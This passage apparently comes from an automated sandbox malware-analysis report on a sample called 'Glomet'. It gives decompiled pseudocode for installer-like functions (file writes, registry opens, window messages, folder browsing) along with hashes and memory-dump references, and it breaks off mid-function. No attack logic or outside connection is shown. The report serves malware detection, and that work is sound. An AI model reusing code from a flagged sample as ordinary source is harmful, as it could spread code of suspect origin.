                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                              • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                                                                                                                              • Instruction ID: d159feaa40f66387c232a0365126d803d89e879c5a9a8176c13ce5bb2f202f1c
                                                                                                                                                                              • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                                                                                                                              • Instruction Fuzzy Hash: CFE0B63221025AAFDF109F95DC00AAB7B6CEB05260F144437FD99E6150D671E961DAE4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00405E91 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405E91(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                              0x00405e95
                                                                                                                                                                              0x00405ea5
                                                                                                                                                                              0x00405ead
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405eb4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405eb6

                                                                                                                                                                              APIs
                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040331E,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405EA5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                              • Instruction ID: f6dbd1b2bb29cf3778f9da1b12eb4ab865b2d476cff05d6c6da3e568d4bed244
                                                                                                                                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                              • Instruction Fuzzy Hash: CEE0EC3221165AABEF119F65DC00AEB7B6CEB05361F004836FA95E3150D631E9219BE4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004060DD Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004060DD(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040605C(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                                                                                                              0x004060e7
                                                                                                                                                                              0x004060ee
                                                                                                                                                                              0x00406101
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406101
                                                                                                                                                                              0x004060f2
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040616B,?,?,?,?,00000002,ExecToStack), ref: 00406101
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Open
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                                              • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                              • Instruction ID: acfb9daac442d6471bee54970dc50a73ebaac4160da87f0822be439bec8b4f66
                                                                                                                                                                              • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                              • Instruction Fuzzy Hash: 01D0123204020DFBEF119F90DD05FAB3B1DAB08310F014426FE06A4091D776D530A724
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040159D() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesA(E00402C39(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                                                                                                                                              0x004015a8
                                                                                                                                                                              0x004015ae
                                                                                                                                                                              0x004015b0
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                              • Opcode ID: 8a8d232dc36d4cf2eee60f63c8ed0e02b6e288e44aa08648e51248d7e12fb2c9
                                                                                                                                                                              • Instruction ID: 3f52c4b603ccfc74cdbb6123baa79f9a690194c4a4ff03e8c12993d7e598b390
                                                                                                                                                                              • Opcode Fuzzy Hash: 8a8d232dc36d4cf2eee60f63c8ed0e02b6e288e44aa08648e51248d7e12fb2c9
                                                                                                                                                                              • Instruction Fuzzy Hash: D8D01232B14104DBDB10DFA5AB0899E73B4DB54324B708577E101F21D1D6B999455B3D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00404320 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00404320(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x42ebf8; // 0x5001c
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                                                                                                              0x00404320
                                                                                                                                                                              0x00404327
                                                                                                                                                                              0x00404332
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404332
                                                                                                                                                                              0x00404338

                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageA.USER32(0005001C,00000000,00000000,00000000), ref: 00404332
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
                                                                                                                                                                              • Instruction ID: 5c6e1af33eb05755d943f79c15c7bc1e123e6569ffc521d05fa768bf99fbbdf6
                                                                                                                                                                              • Opcode Fuzzy Hash: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
                                                                                                                                                                              • Instruction Fuzzy Hash: E9C09B717447017FEE20DB619D45F0777986760701F2544397751F60D0C674E410D61C
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040336B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040336B(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                                                                              0x00403379
                                                                                                                                                                              0x0040337f

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030D1,?,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00403379
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                              • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                                                              • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                                                                                                                              • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                                                              • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00404309 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00404309(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x42f428, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                                                                                                                              0x00404317
                                                                                                                                                                              0x0040431d

                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageA.USER32(00000028,?,00000001,00404139), ref: 00404317
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
                                                                                                                                                                              • Instruction ID: 1318e1a831b13f4a694e23e2858010ee9933afb9cbbae162fbad06e3603bfc21
                                                                                                                                                                              • Opcode Fuzzy Hash: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
                                                                                                                                                                              • Instruction Fuzzy Hash: A9B09236284A00ABDA215B50DE09F4A7A72A768701F408039B240250B0CAB200A5EB18
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004042F6 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004042F6(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42a88c, _a4); // executed
				return _t2;
			}




                                                                                                                                                                              0x00404300
                                                                                                                                                                              0x00404306

                                                                                                                                                                              APIs
                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,004040D2), ref: 00404300
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                                              • Opcode ID: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
                                                                                                                                                                              • Instruction ID: f9921b4c88a1a0ed6e9c6eedf741b01f94502565facb500019f25752580a62db
                                                                                                                                                                              • Opcode Fuzzy Hash: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
                                                                                                                                                                              • Instruction Fuzzy Hash: C5A011B2000000AFCB02AB00EF08C0ABBA2ABA0300B008838A280800388B320832EB0A
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004014D6(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C17(_t7);
				 *((intOrPtr*)(_t13 - 0x38)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                                                                                                                                              0x004014d6
                                                                                                                                                                              0x004014d7
                                                                                                                                                                              0x004014e0
                                                                                                                                                                              0x004014e3
                                                                                                                                                                              0x004014e7
                                                                                                                                                                              0x004014e7
                                                                                                                                                                              0x004014e9
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                              • Opcode ID: 1d33ffbc25aaf2ebbf39683be70fa05d8c52ad4b1d45b29da54ee2863c787776
                                                                                                                                                                              • Instruction ID: 9aaf8c51293fb81f521207d39297afd3f683353c1a64f3bbb741c4b190f6354d
                                                                                                                                                                              • Opcode Fuzzy Hash: 1d33ffbc25aaf2ebbf39683be70fa05d8c52ad4b1d45b29da54ee2863c787776
                                                                                                                                                                              • Instruction Fuzzy Hash: F3D05E73B241009BD720EBB8BAC585F73A8E7903253708837E102F2091EA78C8464A38
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                              Function 00404766 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                                              			E00404766(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;
				void* _t205;

				_t156 = __edx;
				_t82 =  *0x42a068; // 0x59dddc
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405951(0x3fb, _t146);
					E00406535(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405951(0x3fb, _t146);
							if(E00405CD7(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00406257(0x429860, _t146);
							_t87 = E00406663(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406257(0x429860, _t146);
								_t89 = E00405C82(0x429860);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429860) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C30(0x429860);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429860) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BFA(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebfc; // 0x5a1993
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BE2(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429850);
									} else {
										E00404B1D(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042F6(0 | _v8 == _t158);
								if(_v8 == _t158) {
									_t205 =  *0x42a880 - _t158; // 0x0
									if(_t205 == 0) {
										E004046BF();
									}
								}
								 *0x42a880 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a890;
							_v60 = E00404AB7;
							_v56 = _t146;
							_v68 = E004062EA(_t146, 0x42a890, _t166, 0x429c68, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BE9(_t146);
								_t125 =  *((intOrPtr*)( *0x42f430 + 0x11c));
